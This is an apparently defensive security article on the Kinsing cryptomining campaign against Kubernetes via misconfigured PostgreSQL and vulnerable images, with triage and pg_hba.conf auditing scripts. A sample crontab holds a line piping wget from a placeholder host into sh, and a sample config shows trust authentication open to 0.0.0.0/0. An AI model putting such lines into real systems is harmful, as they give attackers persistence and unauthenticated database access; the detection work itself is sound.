Kubernetes Clusters Hacked: What You Need To Know
Summary Of The Attack
- Kinsing malware is targeting Kubernetes clusters.
- Two exploitation paths were used: vulnerable container images and misconfigured PostgreSQL servers.
- The motive behind the attack is cryptocurrency mining to generate revenue.
- Securing Kubernetes clusters is tedious work, but it has to be done.
What Happened?
To gain initial access to Kubernetes environments, the threat actors behind the Kinsing cryptojacking operation have been observed exploiting exposed and improperly configured PostgreSQL servers.
What Is Kinsing?
Kinsing is malware written in Golang, a high-level programming language widely used for building cloud-native applications.
It is compiled with Go 1.13.6.
The malware primarily targets Linux environments and is used mainly for cryptocurrency mining. Once it is installed and running on a victim host, its next goal is to spread to other machines.
The Anatomy Of The Attack
Security researchers at Microsoft analyzed the attack and identified two attack paths.
The first attack path starts with scanning for and enumerating PostgreSQL servers that have configuration issues.
One of the most commonly exploited misconfigurations is the "trust authentication" setting, which makes PostgreSQL assume that any connection established to the server is authorized to access the database.
In addition, if the server's access rules allow a broad range of IP addresses, then whatever address the attacker connects from is accepted, and the attacker can use it to gain access to the server.
The second attack path exploits security flaws in container images. In this scenario, the attackers look for a remote code execution vulnerability that lets them deliver their payload and gain access to the server that way.
From what has been seen so far, the attackers are trying to find and exploit security flaws in these applications:
- WordPress
- Liferay
- PHPUnit
- Oracle WebLogic
Why Kinsing Malware?
The Kinsing malware already has a well-documented history of exploiting containerized environments to mine cryptocurrency. The main goal is to generate revenue for the threat actors by abusing the victim server's hardware resources.
Kinsing On PostgreSQL: Case Study
When researching this topic, Sreeram Venkitesh's write-up came to mind. He described how he detected Kinsing and what he did to remove it from his server.
The lessons learned start with the indicators of compromise: the PostgreSQL database suddenly went down. For no apparent reason the CPU cores were at 100% usage, and he could no longer access PostgreSQL.
The next step was a process review, where he found a process named kinsing, but discovered that it could not simply be killed, because the malware adds a cron job that respawns it (self-replication).
The last part involved finding all of the malicious processes, deleting their files from the /tmp directory, and removing the cron jobs.
This represents a case of successful Kinsing remediation.
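The symptoms in the case study (a process running out of /tmp, CPU pegged at 100%, and a cron entry that re-installs the miner) lend themselves to a simple triage script. The following is an added example, not code from the article or from Sreeram Venkitesh's write-up: it parses constructed `ps -eo pid,pcpu,user,args` output and a constructed crontab, flags the suspicious entries, and orders the clean-up so that the cron persistence is removed before the process is killed. The CPU threshold, the list of world-writable directories, and all sample values (pids, paths, the `example.invalid` host) are assumptions made for illustration.

```python
"""Triage the symptoms described in the case study: a process running out of
/tmp, CPU pegged at 100%, and a cron entry that re-installs the miner.
Added example; the ps and crontab samples are constructed, not real captures."""
import re
from dataclasses import dataclass

# World-writable locations a service binary has no business executing from.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CPU_THRESHOLD = 90.0  # assumed threshold for "pegged" CPU, in %CPU as ps reports it
# A cron command that pipes a download straight into a shell.
DOWNLOAD_AND_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")


@dataclass
class Suspect:
    kind: str      # "process" or "cron"
    ident: int     # pid, or crontab line number
    detail: str    # the command line / crontab entry
    reason: str


def parse_ps(text):
    """Parse `ps -eo pid,pcpu,user,args` output into (pid, pcpu, user, args)."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, pcpu, user, args = parts
        rows.append((int(pid), float(pcpu), user, args))
    return rows


def triage_processes(ps_text):
    """Flag processes whose executable lives in a world-writable directory or
    which are consuming an implausible share of CPU."""
    suspects = []
    for pid, pcpu, user, args in parse_ps(ps_text):
        exe = args.split()[0]
        reasons = []
        if exe.startswith(WRITABLE_DIRS):
            reasons.append(f"executable under {exe.rsplit('/', 1)[0]}/")
        if pcpu >= CPU_THRESHOLD:
            reasons.append(f"{pcpu:.0f}% CPU as {user}")
        if reasons:
            suspects.append(Suspect("process", pid, args, "; ".join(reasons)))
    return suspects


def triage_crontab(cron_text):
    """Flag crontab entries that download-and-execute or run from /tmp-like dirs."""
    suspects = []
    for line_no, raw in enumerate(cron_text.splitlines(), 1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if DOWNLOAD_AND_EXEC.search(entry):
            reasons.append("downloads and executes remote content")
        if any(d in entry for d in WRITABLE_DIRS):
            reasons.append("runs a program from a world-writable directory")
        if reasons:
            suspects.append(Suspect("cron", line_no, entry, "; ".join(reasons)))
    return suspects


def remediation_plan(processes, crons):
    """Order the clean-up so the persistence is gone before the process is
    killed; killing first lets the cron job simply re-launch the miner."""
    steps = [f"remove cron entry {c.ident}: {c.detail}" for c in crons]
    if processes:
        steps.append("kill pids " + ", ".join(str(p.ident) for p in processes))
        binaries = sorted({p.detail.split()[0] for p in processes
                           if p.detail.split()[0].startswith(WRITABLE_DIRS)})
        if binaries:
            steps.append("delete " + ", ".join(binaries))
    steps.append("re-check ps and crontab, then fix the PostgreSQL auth and network exposure")
    return steps


# Constructed sample output of `ps -eo pid,pcpu,user,args` (not a real capture).
SAMPLE_PS = """\
  PID %CPU USER     COMMAND
    1  0.0 root     /sbin/init
  412  0.3 postgres /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main
 2081 99.7 postgres /tmp/kinsing
 2090 97.2 postgres /tmp/worker
 2113  0.1 root     sshd: /usr/sbin/sshd -D
"""

# Constructed crontab of the postgres user (not a real capture).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/pg_dumpall > /backup/all.sql
* * * * * wget -q -O - http://example.invalid/update.sh | sh > /dev/null 2>&1
"""

if __name__ == "__main__":
    procs = triage_processes(SAMPLE_PS)
    crons = triage_crontab(SAMPLE_CRONTAB)
    for s in procs + crons:
        print(f"[{s.kind} {s.ident}] {s.reason}: {s.detail}")
    for i, step in enumerate(remediation_plan(procs, crons), 1):
        print(f"{i}. {step}")
```

On a real host the inputs would come from `ps -eo pid,pcpu,user,args` and `crontab -l -u postgres` (plus `/etc/cron.d`); the point of `remediation_plan` is the ordering, which is exactly the lesson from the case study.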
How Can This Attack Be Prevented?
When it comes to mitigating the exploit path through misconfigured PostgreSQL servers, the best security practices include:
- Removing trust authentication
- Hardening the network access to the database
- Removing default users and extensive permissions
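Both the misconfigurations in the attack description above (trust authentication and an overly broad allowed-address range) and the first two mitigations in this list live in PostgreSQL's `pg_hba.conf`. The following is an added example, not code from the article or from PostgreSQL itself: a small auditor that parses `pg_hba.conf` rules (including the `ADDRESS NETMASK` form) and reports `trust` rules and broad address ranges, skipping `reject` rules since a broad range is what you want there. The two sample configs are constructed, and the prefix-length thresholds in `BROAD_PREFIX` are assumptions to tune for your own network.

```python
"""Audit pg_hba.conf for 'trust' authentication and overly broad address
rules, the two PostgreSQL misconfigurations described in the article.
Added example; the sample configs below are constructed, not real captures."""
import ipaddress
from dataclasses import dataclass

# Authentication methods PostgreSQL accepts in pg_hba.conf. The set is used to
# tell an optional NETMASK column apart from the METHOD column.
KNOWN_METHODS = {
    "trust", "reject", "scram-sha-256", "md5", "password", "gss", "sspi",
    "ident", "peer", "ldap", "radius", "cert", "pam", "bsd",
}
# Prefix lengths at or below these are reported as overly broad (assumed
# thresholds; tune to your network layout).
BROAD_PREFIX = {4: 16, 6: 48}
NETWORK_TYPES = (ipaddress.IPv4Network, ipaddress.IPv6Network)


@dataclass
class Finding:
    line_no: int
    severity: str
    reason: str
    entry: str


def parse_entry(line):
    """Split one pg_hba.conf rule into (type, database, user, network, method).

    network is None for 'local' rules, an ip_network for CIDR or
    ADDRESS NETMASK forms, and the raw string for keywords or hostnames."""
    fields = line.split()
    if fields[0] == "local":
        if len(fields) < 4:
            raise ValueError(f"malformed local rule: {line!r}")
        return fields[0], fields[1], fields[2], None, fields[3].lower()
    if len(fields) < 5:
        raise ValueError(f"malformed host rule: {line!r}")
    conn_type, database, user, address = fields[:4]
    rest = fields[4:]
    # "ADDRESS NETMASK METHOD" form: fold the mask into CIDR-style notation.
    if rest[0].lower() not in KNOWN_METHODS and len(rest) >= 2:
        address = f"{address}/{rest[0]}"
        rest = rest[1:]
    method = rest[0].lower()
    try:
        network = ipaddress.ip_network(address, strict=False)
    except ValueError:
        network = address  # 'all', 'samenet', a hostname, ...
    return conn_type, database, user, network, method


def audit(config_text):
    """Return a list of Finding objects, one per problem, in file order."""
    findings = []
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        conn_type, _db, _user, network, method = parse_entry(line)
        if method == "trust":
            # A remote trust rule is the worst case: anyone who can reach the
            # port is accepted. A local trust rule still lets any OS user in.
            severity = "high" if conn_type != "local" else "medium"
            findings.append(Finding(line_no, severity,
                "trust authentication: clients are accepted without credentials", line))
        if method == "reject":
            continue  # a broad range is fine when the rule denies
        if isinstance(network, str) and network == "all":
            findings.append(Finding(line_no, "high",
                "address 'all': rule matches connections from any IP", line))
        elif isinstance(network, NETWORK_TYPES) and network.prefixlen <= BROAD_PREFIX[network.version]:
            severity = "high" if network.prefixlen == 0 else "medium"
            findings.append(Finding(line_no, severity,
                f"address range {network} is overly broad", line))
    return findings


# Constructed example of the weak configuration the attackers look for.
WEAK_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS              METHOD
local   all       all                        trust
host    all       all   0.0.0.0/0            trust
host    all       all   10.0.0.0 255.0.0.0   md5
"""

# Constructed hardened counterpart: no trust, tight ranges, explicit deny-all.
HARDENED_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS              METHOD
local   all       all                        peer
host    all       all   127.0.0.1/32         scram-sha-256
hostssl appdb     app   10.42.7.0/24         scram-sha-256
host    all       all   0.0.0.0/0            reject
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_PG_HBA), ("hardened", HARDENED_PG_HBA)):
        results = audit(cfg)
        print(f"== {name}: {len(results)} finding(s)")
        for f in results:
            print(f"  line {f.line_no} [{f.severity}] {f.reason}: {f.entry}")
```

Run it against `$PGDATA/pg_hba.conf` (or the file mounted into the database pod) on each cluster; a clean run is not proof the database is safe, but any `trust` or `/0` finding is exactly the hole this campaign walks through.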
On the other hand, securing the container images should include:
- Using known, trusted registries for container images.
- Scanning images for vulnerabilities regularly and keeping them all up to date.
- Hardening the network access to the system.
- Timely patching of services so vulnerable versions do not exist on your system.
The official Kubernetes documentation offers an extremely well-written guide on protecting Kubernetes clusters.